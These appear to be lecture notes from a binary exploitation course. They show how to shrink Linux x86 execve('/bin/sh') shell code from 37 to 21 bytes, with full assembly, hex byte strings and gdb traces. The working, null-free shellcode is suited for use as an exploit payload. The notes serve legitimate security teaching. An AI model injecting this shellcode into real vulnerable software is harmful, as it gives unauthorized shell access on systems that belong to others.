Lec. 12: Short Shell Code

1 Reducing the Size of Shell Code

Shell code has three main properties: (1) it executes a system call to open a shell or perform some other action; (2) it does not contain null bytes; and (3) it is small. So far, the shell code we've developed is 37 bytes long. Let's review that piece of shell code now:

SECTION .text                   ; Code section
                global _start   ; Make label available to linker

_start:                         ; Standard ld entry point

         jmp callback           ; Jump to the end to get our current address

dowork:
         pop esi                ; esi now holds the address of "/bin/sh"

         xor edx,edx            ; edx = 0 (it's also param #3 - NULL)
         push edx               ; args[1] - NULL
         push esi               ; args[0] - "/bin/sh"

         mov ecx,esp            ; Param #2 - address of args array
         mov ebx,esi            ; Param #1 - "/bin/sh"
         xor eax,eax            ; eax = 0
         mov al,0xb             ; System call number for execve
         int 0x80               ; Interrupt 80 hex - invoke system call

         xor ebx,ebx            ; Exit code, 0 = normal
         xor eax,eax            ; eax = 0
         inc eax                ; System call number for exit (1)
         int 0x80               ; Interrupt 80 hex - invoke system call

callback:
         call dowork            ; Pushes the address of "/bin/sh" onto the stack
         db "/bin/sh",0         ; The program we want to run - "/bin/sh"

To see its current size, let's assemble and link it, then use the hexify program to count the number of bytes:

user@si485H-base:demo$ nasm -g -f elf -o long_shell.o long_shell.asm
user@si485H-base:demo$ ld  -o long_shell long_shell.o
user@si485H-base:demo$ ./hexify.sh long_shell
\xeb\x16\x5e\x31\xd2\x52\x56\x89\xe1\x89\xf3\x31\xc0\xb0\x0b\xcd\x80\x31\xdb\x31\xc0\x40\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00
user@si485H-base:demo$ printf `./hexify.sh long_shell` | wc -c
37

That may seem ok: 37 bytes is pretty short. We can do better, though, and it is worth the effort: the shorter the shell code, the more easily it fits as a payload.
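As a cross-check on that count, here is a small Python sketch that parses the hexify output above, counts the bytes, and lists the offset of any null byte. Python is not part of the toolchain used in these notes, and the helper name parse_hexified is made up for illustration.

```python
import re

# Output of ./hexify.sh long_shell, copied from the listing above.
HEXIFIED = (
    r"\xeb\x16\x5e\x31\xd2\x52\x56\x89\xe1\x89\xf3\x31\xc0\xb0\x0b\xcd\x80"
    r"\x31\xdb\x31\xc0\x40\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f"
    r"\x73\x68\x00"
)

def parse_hexified(text):
    """Turn a string of \\xNN escapes into the raw bytes it describes."""
    pairs = re.findall(r"\\x([0-9a-fA-F]{2})", text)
    return bytes(int(pair, 16) for pair in pairs)

shellcode = parse_hexified(HEXIFIED)
null_offsets = [i for i, b in enumerate(shellcode) if b == 0]

print(len(shellcode))   # 37
print(null_offsets)     # [36]
```

The one zero, at offset 36, is the string terminator that comes from the db "/bin/sh",0 line.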

1.1 Using the Stack More Effectively

Our first target for reducing the size of the shell code is the jmp-callback procedure. Let's look at the objdump of the code to see how many bytes it uses:

08048060 <_start>:
 8048060: eb 16                 jmp    8048078 <callback>

08048062 <dowork>:
 8048062: 5e                    pop    esi
 8048063: 31 d2                 xor    edx,edx
 8048065: 52                    push   edx
 8048066: 56                    push   esi
 8048067: 89 e1                 mov    ecx,esp
 8048069: 89 f3                 mov    ebx,esi
 804806b: 31 c0                 xor    eax,eax
 804806d: b0 0b                 mov    al,0xb
 804806f: cd 80                 int    0x80
 8048071: 31 db                 xor    ebx,ebx
 8048073: 31 c0                 xor    eax,eax
 8048075: 40                    inc    eax
 8048076: cd 80                 int    0x80

08048078 <callback>:
 8048078: e8 e5 ff ff ff        call   8048062 <dowork>
 804807d: 2f                    das    
 804807e: 62 69 6e              bound  ebp,QWORD PTR [ecx+0x6e]
 8048081: 2f                    das    
 8048082: 73 68                 jae    80480ec <callback+0x74>

If you look closely at the call instruction, you see that this takes 5 whole bytes! That's simply too many. Let's look for a way to reduce this.
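Why 5 bytes? The call is one opcode byte (e8) followed by a 4-byte signed displacement, measured from the address of the next instruction; unlike jmp, call has no short one-byte-displacement form. The following Python sketch decodes both displacements from the objdump above. The function name rel_target is an illustrative assumption, not part of any tool.

```python
import struct

def rel_target(next_addr, disp_bytes):
    """Target of a relative jmp/call: the address of the next instruction
    plus the signed little-endian displacement stored in the instruction."""
    fmt = {1: "<b", 4: "<i"}[len(disp_bytes)]
    (disp,) = struct.unpack(fmt, disp_bytes)
    return next_addr + disp, disp

# call at 0x8048078 is e8 e5 ff ff ff: 1 opcode byte + 4 displacement bytes,
# so the next instruction (really the string) starts at 0x804807d.
call_target, call_disp = rel_target(0x804807D, bytes.fromhex("e5ffffff"))

# jmp at 0x8048060 is eb 16: 1 opcode byte + 1 displacement byte.
jmp_target, jmp_disp = rel_target(0x8048062, bytes.fromhex("16"))

print(call_disp, hex(call_target))  # -27 0x8048062
print(jmp_disp, hex(jmp_target))    # 22 0x8048078
```

Because the call jumps backwards, its displacement is negative and the upper bytes are 0xff rather than 0x00, which keeps null bytes out of the instruction.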

1.1.1 Attempt 1

Let's try the strategy where we push all the bytes of the "/bin/sh" onto the stack, one-by-one, and then the stack pointer will be the address of the start of the string. Something like this:

SECTION .text                   ; Code section
                 global _start  ; Make label available to linker
_start:
         xor eax,eax

         push eax               ;\0
         push 0x68              ;h
         push 0x73              ;s
         push 0x2f              ;/
         push 0x6e              ;n
         push 0x69              ;i
         push 0x62              ;b
         push 0x2f              ;/

         mov esi,esp            ; esp is address of "/bin/sh"

         xor edx,edx            ; edx = 0 (it's also param #3 - NULL)
         push edx               ; args[1] - NULL
         push esi               ; args[0] - "/bin/sh"


         mov ecx,esp            ; Param #2 - address of args array
         mov ebx,esi            ; Param #1 - address of "/bin/sh" (saved in esi)
         mov al,0xb             ; System call number for execve
         int 0x80               ; Interrupt 80 hex - invoke system call

         xor ebx,ebx            ; Exit code, 0 = normal
         xor eax,eax            ; eax = 0
         inc eax                ; System call number for exit (1)
         int 0x80               ; Interrupt 80 hex - invoke system call

Looking at this, we get the same effect as the jmp-callback: a position-independent reference to the string "/bin/sh". Let's take a look at the objdump to see how this changed things:

Disassembly of section .text:

08048060 <_start>:
 8048060:	31 c0                	xor    eax,eax
 8048062:	50                   	push   eax
 8048063:	6a 68                	push   0x68
 8048065:	6a 73                	push   0x73
 8048067:	6a 2f                	push   0x2f
 8048069:	6a 6e                	push   0x6e
 804806b:	6a 69                	push   0x69
 804806d:	6a 62                	push   0x62
 804806f:	6a 2f                	push   0x2f
 8048071:	89 e6                	mov    esi,esp
 8048073:	31 d2                	xor    edx,edx
 8048075:	52                   	push   edx
 8048076:	56                   	push   esi
 8048077:	89 e1                	mov    ecx,esp
 8048079:	89 f3                	mov    ebx,esi
 804807b:	b0 0b                	mov    al,0xb
 804807d:	cd 80                	int    0x80
 804807f:	31 db                	xor    ebx,ebx
 8048081:	31 c0                	xor    eax,eax
 8048083:	40                   	inc    eax
 8048084:	cd 80                	int    0x80

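Looking closely, each single-byte push takes two bytes, and there are 7 of them, for 14 bytes. Add one byte for push eax and two for mov esi,esp, and building the string costs 17 bytes. Referring back to the jmp-callback version of the code, there were 2 bytes for the jmp, 1 for the pop, 5 for the call, and 8 for the string with its terminator: 16 bytes. We gained nothing! In fact, this version is a byte longer.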
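To compare the two versions as whole programs, we can tally the instruction bytes straight from the two objdump listings above. This is only a Python sketch for bookkeeping; the list names are made up, and the trailing zero of the string is taken from the hexify output since objdump's disassembly does not show it.

```python
# Instruction bytes copied from the two objdump listings above,
# one entry per instruction.
JMP_CALL = [
    "eb 16", "5e", "31 d2", "52", "56", "89 e1", "89 f3", "31 c0", "b0 0b",
    "cd 80", "31 db", "31 c0", "40", "cd 80",
    "e8 e5 ff ff ff",
    "2f 62 69 6e 2f 73 68 00",   # "/bin/sh" plus its terminating zero
]
PUSH_BYTES = [
    "31 c0", "50", "6a 68", "6a 73", "6a 2f", "6a 6e", "6a 69", "6a 62",
    "6a 2f", "89 e6", "31 d2", "52", "56", "89 e1", "89 f3", "b0 0b",
    "cd 80", "31 db", "31 c0", "40", "cd 80",
]

def size(listing):
    """Total number of bytes in a list of hex-encoded instructions."""
    return sum(len(bytes.fromhex(entry)) for entry in listing)

print(size(JMP_CALL))    # 37
print(size(PUSH_BYTES))  # 38
```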

Worse, let's see if this shell code actually works:

user@si485H-base:demo$ ./push_shell_1 
user@si485H-base:demo$

Fail.

To figure out why this shell code doesn't work, we'll have to trace its execution in gdb.

user@si485H-base:demo$ gdb -q push_shell_1 
Reading symbols from push_shell_1...done.
(gdb) b _start
Breakpoint 1 at 0x8048060
(gdb) r
Starting program: /home/user/git/si485-binary-exploits/lec/12/demo/push_shell_1 

Breakpoint 1, 0x08048060 in _start ()
(gdb) ds
Dump of assembler code for function _start:
=> 0x08048060 <+0>:	xor    eax,eax
   0x08048062 <+2>:	push   eax
   0x08048063 <+3>:	push   0x68
   0x08048065 <+5>:	push   0x73
   0x08048067 <+7>:	push   0x2f
   0x08048069 <+9>:	push   0x6e
   0x0804806b <+11>:	push   0x69
   0x0804806d <+13>:	push   0x62
   0x0804806f <+15>:	push   0x2f
   0x08048071 <+17>:	mov    esi,esp
   0x08048073 <+19>:	xor    edx,edx
   0x08048075 <+21>:	push   edx
   0x08048076 <+22>:	push   esi
   0x08048077 <+23>:	mov    ecx,esp
   0x08048079 <+25>:	mov    ebx,esi
   0x0804807b <+27>:	mov    al,0xb
   0x0804807d <+29>:	int    0x80
   0x0804807f <+31>:	xor    ebx,ebx
   0x08048081 <+33>:	xor    eax,eax
   0x08048083 <+35>:	inc    eax
   0x08048084 <+36>:	int    0x80
End of assembler dump.
(gdb) x/3x $esp
0xbffff720:	0x00000001	0xbffff847	0x00000000

Looking at the stack at this point, things seem to be going okay. Let's take three steps:

(gdb) ni 3
0x08048065 in _start ()
(gdb) ds
Dump of assembler code for function _start:
   0x08048060 <+0>:	xor    eax,eax
   0x08048062 <+2>:	push   eax
   0x08048063 <+3>:	push   0x68
=> 0x08048065 <+5>:	push   0x73
   0x08048067 <+7>:	push   0x2f
   0x08048069 <+9>:	push   0x6e
   0x0804806b <+11>:	push   0x69
   0x0804806d <+13>:	push   0x62
   0x0804806f <+15>:	push   0x2f
   0x08048071 <+17>:	mov    esi,esp
   0x08048073 <+19>:	xor    edx,edx
   0x08048075 <+21>:	push   edx
   0x08048076 <+22>:	push   esi
   0x08048077 <+23>:	mov    ecx,esp
   0x08048079 <+25>:	mov    ebx,esi
   0x0804807b <+27>:	mov    al,0xb
   0x0804807d <+29>:	int    0x80
   0x0804807f <+31>:	xor    ebx,ebx
   0x08048081 <+33>:	xor    eax,eax
   0x08048083 <+35>:	inc    eax
   0x08048084 <+36>:	int    0x80
End of assembler dump.
(gdb) x/3x $esp
0xbffff718:	0x00000068	0x00000000	0x00000001

Ok. Now we have a sense of what is going on. Looking closely, you can see that when we pushed 0x68, we didn't push just the byte 0x68; we pushed the 4-byte value 0x00000068. Why?

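The stack is kept 4-byte aligned. This is to ensure that when you push and pop, you get consistent answers: the thing that you push onto the stack is exactly what gets popped off. In 32-bit code, a push with a one-byte operand does not store one byte; the processor sign-extends the operand to 4 bytes and stores all of them. There is no instruction that pushes a single byte, so we must ALWAYS think in 4-byte values. For our shell code, that means the byte right after the leading '/' is a zero, and the string at esp is just "/". But, we can work with that.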
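To see what the first attempt really left in memory, here is a toy Python model of a 32-bit stack. It is an illustration only: the Stack class and its method names are made up, and it models nothing beyond 4-byte little-endian pushes.

```python
import struct

class Stack:
    """Toy model of a 32-bit stack that grows toward lower addresses."""

    def __init__(self, size=64):
        self.mem = bytearray(size)
        self.esp = size

    def push(self, value):
        # Every push stores a full 32-bit little-endian value.
        self.esp -= 4
        self.mem[self.esp:self.esp + 4] = struct.pack("<I", value & 0xFFFFFFFF)

    def c_string_at_esp(self):
        # Read bytes from esp up to the first zero, the way a C string is read.
        end = self.mem.index(0, self.esp)
        return bytes(self.mem[self.esp:end])

stack = Stack()
stack.push(0)                 # push eax (eax = 0)
for ch in "hs/nib/":          # push 0x68, 0x73, 0x2f, 0x6e, 0x69, 0x62, 0x2f
    stack.push(ord(ch))

print(stack.mem[stack.esp:stack.esp + 8].hex())  # 2f00000062000000
print(stack.c_string_at_esp())                   # b'/'
```

So the path handed to execve is "/", a directory, and the call fails; execution then falls through to the exit system call, which is why the program returned silently.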

1.1.2 Attempt 2

Now that we are a bit more familiar with the stack, we can change our shell code to push the entire byte sequence for "/bin/sh" in two steps.

Problem: "/bin/sh" is 7 bytes long, and we can only push 4-byte sequences! We can solve this by exploiting how file system paths are parsed: repeated slashes are treated as a single slash. For example, "//bin/sh" is the same as "/bin//sh", which is the same as "/bin/sh". That gives us an 8-byte string, which is exactly two pushes.

With that, we have the following shell code:

SECTION .text                   ; Code section
                 global _start  ; Make label available to linker
_start:
        xor eax,eax
        push eax                ;\0
        push 0x68732f6e         ;n/sh
        push 0x69622f2f         ;//bi 

        mov esi,esp             ; esi = esp = address of "//bin/sh"

        xor edx,edx             ; edx = 0 (it's also param #3 - NULL)
        push edx                ; args[1] - NULL
        push esi                ; args[0] - "//bin/sh"


        mov ecx,esp             ; Param #2 - address of args array
        mov ebx,esi             ; Param #1 - address of "//bin/sh"
        mov al,0xb              ; System call number for execve
        int 0x80                ; Interrupt 80 hex - invoke system call

        xor ebx,ebx             ; Exit code, 0 = normal
        xor eax,eax             ; eax = 0
        inc eax                 ; System call number for exit (1)
        int 0x80                ; Interrupt 80 hex - invoke system call

Looking closely at the two push instructions, we have to be mindful of both the push order and little-endian byte order.

push 0x68732f6e         ;n/sh
push 0x69622f2f         ;//bi

Note first that the last thing pushed onto the stack is the start of the string. The byte 0x2f is '/', and looking closely at the bytes, you see that the number 0x69622f2f reads as "ib//", which, when stored in little-endian order, becomes "//bi" in memory.

Finally, we still have to NULL terminate the string, so the first thing we push onto the stack is a zero word. When all is said and done, we get the following:

      | 0x0 0x0 0x0 0x0 | 0x00000000
      | 'n' '/' 's' 'h' | 0x68732f6e
esp-> | '/' '/' 'b' 'i' | 0x69622f2f
      '-----------------'

And, we can now use the value of esp as the start of the "//bin/sh\0" string.
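The push order and byte order are easy to get backwards, so here is a short Python sketch that derives the two immediates from the string. The function name push_immediates is an assumption made for this example, and it only handles paths whose length is already a multiple of 4.

```python
import struct

def push_immediates(path):
    """Return the 32-bit immediates to push, in push order, so that esp ends
    up pointing at `path`. Assumes len(path) is a multiple of 4."""
    data = path.encode("ascii")
    if len(data) % 4 != 0:
        raise ValueError("pad the path (e.g. with an extra '/') to a multiple of 4")
    chunks = [data[i:i + 4] for i in range(0, len(data), 4)]
    # The stack grows down, so the last chunk of the string is pushed first.
    return [struct.unpack("<I", chunk)[0] for chunk in reversed(chunks)]

for value in push_immediates("//bin/sh"):
    print(f"push 0x{value:08x}")
# push 0x68732f6e
# push 0x69622f2f
```

Reading each chunk as a little-endian integer is what turns "n/sh" into 0x68732f6e; the terminating zero word still has to be pushed before either of these.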

Let's compile and see if this works:

user@si485H-base:demo$ ld  -o push_shell_2 push_shell_2.o
user@si485H-base:demo$ ./push_shell_2 
$ echo "It worked!"
It worked!
$

And, we can see how many bytes it is:

user@si485H-base:demo$ printf `./hexify.sh push_shell_2` | wc -c
34

Woohoo! We saved 3 bytes.

1.2 Removing Crud from the Shell Code

The next place to turn our frugal eyes upon is the extra bit of crud in the shell code. In particular, let's start by removing the exit system call. Why do we need to exit cleanly from our shell code if we fail to execve? Who cares? We are trying to bring down the systems and a bit of segfaulting here and there is ok by me.

The second item we want to focus on is the execve() call itself. It turns out that you don't need to do quite as much work for the shell to execute. Consider this small example program:

user@si485H-base:demo$ cat small_execve.c 
#include <unistd.h>

int main(){
  execve("/bin/sh",NULL,NULL);
}

Notice that in this execve call there is no argv array. We just leave it NULL, which is not preferred but still works on Linux: the kernel treats a NULL argv as an empty argument list. This behavior is nonstandard and not portable to other UNIX systems. In fact, running this program works fine:

user@si485H-base:demo$ gcc small_execve.c   -o small_execve
small_execve.c: In function ‘main’:
small_execve.c:4:3: warning: null argument where non-null required (argument 2) [-Wnonnull]
   execve("/bin/sh",NULL,NULL);
   ^
user@si485H-base:demo$ ./small_execve 
$ echo "It Works!"           
It Works!
$

Yes, the compiler complains, but who cares if it works.

With these changes, we are left with the following shell code:

SECTION .text                   ; Code section
                 global _start  ; Make label available to linker
_start:
        xor eax,eax
        push eax                ;\0
        push 0x68732f6e         ;n/sh
        push 0x69622f2f         ;//bi 

        xor edx,edx             ; Param #3 - NULL
        xor ecx,ecx             ; Param #2 - NULL
        mov ebx,esp             ; Param #1 - "/bin/sh" is *esp
        mov al,0xb              ; System call number for execve
        int 0x80                ; Interrupt 80 hex - invoke system call

And we can compile and test:

user@si485H-base:demo$ nasm -f elf smaller_shell.asm -o smaller_shell.o
user@si485H-base:demo$ ld smaller_shell.o -o smaller_shell
user@si485H-base:demo$ ./smaller_shell 
$ echo "It Works!"    
It Works!
$ 
user@si485H-base:demo$ printf `./hexify.sh smaller_shell` | wc -c
23

Now we are at 23 bytes! Wow. But believe it or not, we can still do 2 bytes better.

1.3 Zeroing Out Better

The last place to gain an advantage, and it is a small one, is in the process of zeroing registers. There are a number of instructions designed for 8-byte arithmetic that use two registers to store results that overflow a 4-byte number. The instruction we will concern ourselves with is the mul instruction.

The mul instruction has the following form:

mul reg

It will:

Multiply the value in reg by the value currently in eax
Store the result with the lower 4 bytes in eax and the upper 4 bytes in edx

What does this imply? Well, if we multiply by a register whose value is zero, then eax will be zero AND edx will be zero. The mul instruction is just two bytes, and with those two bytes we zero two registers, replacing two two-byte xor instructions and saving us two bytes overall.
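A quick Python model of the 32-bit mul makes the point concrete: whatever garbage eax holds, multiplying by zero clears both halves of the result. The function name mul32 is made up for this sketch, and it models only the register results, not the flags.

```python
MASK32 = 0xFFFFFFFF

def mul32(eax, operand):
    """Model of 32-bit `mul`: unsigned eax * operand, with the 64-bit
    product split into eax (low half) and edx (high half)."""
    product = (eax & MASK32) * (operand & MASK32)
    return product & MASK32, product >> 32   # (new eax, new edx)

print(mul32(0xDEADBEEF, 0))   # (0, 0)
print(mul32(0xFFFFFFFF, 2))   # (4294967294, 1)
```

The second call shows the normal use of the instruction: the product overflows 4 bytes, and the overflow lands in edx.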

Here's the resulting shell code:

user@si485H-base:demo$ cat smallest_shell.asm 
SECTION .text                   ; Code section
                 global _start  ; Make label available to linker
_start:
        xor ecx,ecx
        mul ecx                 ;0's edx and eax
        push eax                ;\0
        push 0x68732f6e         ;n/sh
        push 0x69622f2f         ;//bi 


        mov ebx,esp             ; Param #1 - "/bin/sh" is *esp
        mov al,0xb              ; System call number for execve
        int 0x80                ; Interrupt 80 hex - invoke system call

If you look at the two instructions at the top:

xor ecx,ecx
mul ecx

By first zeroing out ecx and then doing mul ecx, we multiply the value in eax by zero and store zero in both eax and edx.

We can show that this shell code does work and see how many bytes it is:

user@si485H-base:demo$ nasm -f elf smallest_shell.asm -o smallest_shell.o
user@si485H-base:demo$ ld smallest_shell.o -o smallest_shell
user@si485H-base:demo$ ./smallest_shell 
$ echo "It Works!"
It Works!
$ 
user@si485H-base:demo$ printf `./hexify.sh smallest_shell` | wc -c
21

We are now at 21 bytes! And, that's about as small as it can get. I haven't seen any examples much smaller than this that work consistently.
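As a final sanity check, the Python sketch below tallies the 21 bytes and confirms there is no null byte among them. The encodings are hand-assembled from the standard 32-bit opcodes and match the style of the earlier objdump listings; they are an assumption, not output captured from hexify.sh.

```python
# Hand-assembled encodings for smallest_shell.asm (an assumption: standard
# 32-bit encodings, not output captured from the tools used in these notes).
INSTRUCTIONS = [
    ("xor ecx,ecx",     "31 c9"),
    ("mul ecx",         "f7 e1"),
    ("push eax",        "50"),
    ("push 0x68732f6e", "68 6e 2f 73 68"),
    ("push 0x69622f2f", "68 2f 2f 62 69"),
    ("mov ebx,esp",     "89 e3"),
    ("mov al,0xb",      "b0 0b"),
    ("int 0x80",        "cd 80"),
]

shellcode = b"".join(bytes.fromhex(enc) for _, enc in INSTRUCTIONS)

print(len(shellcode))   # 21
print(0 in shellcode)   # False
```

The two 5-byte pushes account for almost half of the total, which is the price of carrying the string itself.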